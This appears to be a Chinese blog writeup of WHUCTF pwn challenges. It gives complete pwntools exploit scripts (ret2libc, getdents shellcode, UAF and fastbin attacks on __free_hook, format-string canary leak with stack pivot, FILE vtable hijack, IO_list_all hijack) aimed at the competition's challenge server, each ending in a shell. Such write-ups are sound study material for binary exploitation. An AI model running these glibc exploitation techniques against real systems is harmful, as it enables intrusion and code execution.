whuctf pwn writeup

写在前面:

这次比赛还是挺酷的,学到了一些骚操作,感谢武汉大学举办的这次比赛

概述:

  • Pwnpwn:签到题,ret2libc
  • Shellcode: 开启了沙盒并且flag路径未知时的处理情况
  • FFF : uaf利用,unsorted bin attrack打再free_hook上方写入main_arena地址,fastbin attrack打free_hook
  • Arbitrary: f3泄露地址,f1、f3栈迁移getshell
  • Overflow: 伪造stdout,劫持vtable指向one_gadget
  • Attention : fastbin attrack打数组指针
  • Heaptrick: 任意地址写global_max_fast,io_finsh打io_list_all

pwnpwn:

简单的栈溢出,ret2libc
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

binary = 'pwnpw'
elf = ELF('pwnpw')
libc = ELF("./libc-2.23.so")
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10004
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = "a"*(0x88+0x4)+p32(elf.plt["write"])+p32(0x0804843B)+p32(1)+p32(elf.got["read"])+p32(8)
p.recv()
p.sendline(payload)
libc_base = l32()-libc.sym["read"]
lg("libc_base",libc_base)
sys_addr = libc.sym["system"]+libc_base
sh_addr = libc_base+libc.search("/bin/sh").next()
payload = "a"*(0x88+0x4)+p32(sys_addr)+p32(0)+p32(sh_addr)
p.recv()
p.sendline(payload)
# gdb.attach(p)
p.interactive()

shellcode:

题目就是一个简单shellcode调用,难点在于不知道flag路径,需要自己寻
找,这里用到了一个函数sys_getdents

int getdents(unsigned int fd, struct linux_dirent *dirp,unsigned int count);

该函数是一个解析文件夹的函数,第一个参数时要解析的文件句柄,第二个参数是存放解析数据的位置,count是dirp的大小,通过这个我们就可以解析文件夹,但是解析数据的情况有点糟糕,但也不难辨认,需要注意的是当打开文件夹时open的第二个参数为0x10000,打开文件时的参数为0



可以看到有一个FFFFFFFlag的文件夹,我们进一步解析这个文件夹

解析成功,然后我们把open的第二个参数换成0,getdents改为read就好了

可以看到成功打印出flag,
第一部分的shellcode:

payload = shellcraft.open("./",0x10000)
payload += shellcraft.getdents("rax","rsp",0x300)
payload += shellcraft.write(1,"rsp",0x300)

第二部分shellcode:

payload = shellcraft.open("./FFFFFFFFFlag/flag",0)
payload += shellcraft.read("rax","rsp",0x300)
payload += shellcraft.write(1,"rsp",0x300)

小结:

当不知道flag路径时使用getdents函数

FFF:

uaf的利用,先unsortedbin attrak再free_hook上方写入main_arnea的地址,然后fastbinattrack打free_hook,当然打malloc_hook也可

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'pwn222'
elf = ELF('pwn222')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10007
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def choice(idx):
    sla("> ",str(idx))
def add(size):
    choice(1)
    sla("size?\n",str(size))
def show(idx):
    choice(3)
    sla("index?\n",str(idx))
def edit(idx,size,payload):
    choice(2)
    sla("index?\n",str(idx))
    sla("size?\n",str(size))
    sleep(0.1)
    p.sendline(payload)
def free(idx):
    choice(4)
    sla("index?",str(idx))
add(0x88)
add(0x68)
add(0x68)
free(0)
show(0)
libc_base = l64()-0x3c4b78
lg("libc_base",libc_base)
malloc_hook = 0x3c4b78+libc_base
sys_addr = libc_base+magic[3]
free_hook = libc_base+magic[1]

edit(0,0x88,p64(0)+p64(free_hook-0x20))
add(0x88)
free(1)
# free(2)
edit(1,0x68,p64(free_hook-0x13))
add(0x68)
add(0x68)
edit(5,0x68,"a"*3+p64(sys_addr))
edit(2,0x68,"/bin/sh\x00")
free(2)
# gdb.attach(p)
p.interactive()

arbitrary:

格式化字符串漏洞泄露canary,libc,栈迁移:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'pwn4'
elf = ELF('pwn4')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10005
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recv()
p.sendline("3")
p.recv()
p.sendline("%p-%p-%p-%p-%p*%p-%p+%p-%p=%p-%p-%p-%p")

ru("*0x")
codebase = int(p.recv(12),16)-0xca7
lg("codebase",codebase)
ru("+0x")
canary = int(p.recv(16),16)-0xa
lg("canary",canary)
ru("=")
ru("0x")
libc_base = int(p.recv(12),16)-0x20830
lg("libc_base",libc_base)
note = 0x20204C+codebase
p.recv()
p.sendline("1")
p.recv()
p.sendline(str(note))
p.recv()
p.sendline("3")
p.recv()
popr = 0x0000000000021102+libc_base
sh = libc_base+libc.search("/bin/sh").next()
sys = libc.sym["system"]+libc_base
leaver = 0x0000000000042351+libc_base
one = o_g[1]+libc_base
rop = p64(0)+p64(one)
p.sendline(rop)
p.recv()
p.sendline("2")
p.recv()
note = 0x0202060+codebase
payload = p64(canary)*8+p64(note)+p64(leaver)
p.send(payload)
p.recv()
# gdb.attach(p)
p.send(payload)
"""
WHUCTF{Do_yOu_kNow_canary}
"""
p.interactive()

overflow:

伪造io_file劫持vtable指向one_gadget:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'pwn3'
elf = ELF('pwn3')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10006
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
ru("0x")
addr = int(p.recv(12),16)
lg("addr",addr)
codebase = addr-0x202060
lg("codebase",codebase)
def choice(idx):
    sla("Choice:",str(idx))
def show(offset):
    choice(1)
    sla("Offset:\n",str(offset))
def edit(offset,size,data):
    choice(2)
    sla("Offset:\n",str(offset))
    sla("Size:\n",str(size))
    sa("data:\n",payload)
show("-32")
libc_base = l64()-0x3c5540
lg("libc_base",libc_base)
sys_addr = libc_base+libc.sym["system"]
one = o_g[1]+libc_base
jump = libc_base+libc.symbols["_IO_file_jumps"]+0xc0
sh_addr = 0x18cd57+libc_base
payload = p64(0xfbad8800)+p64(addr)*7
payload += p64(addr+1)+p64(0)*4+p64(addr)+p64(1)
payload += p64(0xffffffffffffffff)+p64(0)+p64(addr)+p64(0xffffffffffffffff)
payload += p64(0)+p64(addr)+p64(0)*3+p32(0xffffffff)+p32(0)+p64(0)*2+p64(addr+240)
payload += p64(one)*10
edit(0, "-1", payload)
p.recv()
p.sendline("2")
p.recv()
p.sendline("-48")
p.recv()
p.sendline(str(8))
p.recv()
gdb.attach(p)
p.sendline(p64(addr))
#WHUCTF{Bss_Overflow_And_File_Struct_Exploitation}
p.interactive()

attention:

fastbin attrack打数组指针:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'pwnpwn'
elf = ELF('pwnpwn')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10002
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def choice(idx):
    sla("your choice :",str(idx))
def add():
    choice(1)
def show():
    choice(4)
def free():
    choice(3)
def edit(name,data):
    choice(2)
    sa("name:\n",name)
    sa("data:\n",data)
for i in range(31):
    add()
    free()
edit(p64(0x6010b0-0x10), 'aaa')
add()
add()
edit(p64(elf.got["atoi"]), 'aaa')
show()
libc_base = l64()-libc.sym["atoi"]
sys_addr = libc.sym["system"]+libc_base
edit(p64(sys_addr),p64(0))
# gdb.attach(p)
p.interactive()

heaptrick

任意地址写global_max_fast,io_finsh打io_list_all:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'pwn1'
elf = ELF('pwn1')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "218.197.154.9"
  port =  10003
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def choice(idx):
    sla("4.exit\n",str(idx))
def add(size,payload):
    choice(1)
    sla("Length:",str(size))
    sa("Content:\n",payload)
def free(idx):
    choice(2)
    sla("Id:\n",str(idx))
def edit(payload):
    choice(3)
    sla("Name:\n",str(payload))
add(0x100,"aaaa")
add(0x100,"aaaa")
add(0x1400,"aaaa")
add(0x100,"aaaa")
free(0)
add(0x100,'\xa0')
libc_base = l64()-0x3c4ba0
lg("libc_base",libc_base)
p.recv()
p.sendline("666")
ru("0x")
codebase = int(p.recv(12),16)
lg("codebase",codebase)
globalmax = 0x3c67f8+libc_base
free_hook = libc_base+libc.sym["__free_hook"]
jump = libc_base+libc.symbols["_IO_file_jumps"]+0xc0
sh_addr = 0x18cd57+libc_base
sys_addr = libc.sym["system"]+libc_base
one = o_g[1]+libc_base
payload = p64(globalmax)*5
edit(payload)
free(2)
payload = p64(0)*2
payload += p64(0)+p64(1)
payload += p64(0)+p64(sh_addr)
payload = payload.ljust(0xc8,"\x00")
payload += p64(jump-0x8)+p64(0)+p64(sys_addr)
add(0x1400,payload)
free(2)
p.recv()
p.sendline("1")
p.recv()
p.sendline(str(0x100))
# gdb.attach(p)
p.interactive()
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,830评论 5 468
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,992评论 2 376
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,875评论 0 331
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,837评论 1 271
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,734评论 5 360
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,091评论 1 277
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,550评论 3 390
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,217评论 0 254
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,368评论 1 294
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,298评论 2 317
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,350评论 1 329
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,027评论 3 315
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,623评论 3 303
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,706评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,940评论 1 255
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,349评论 2 346
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,936评论 2 341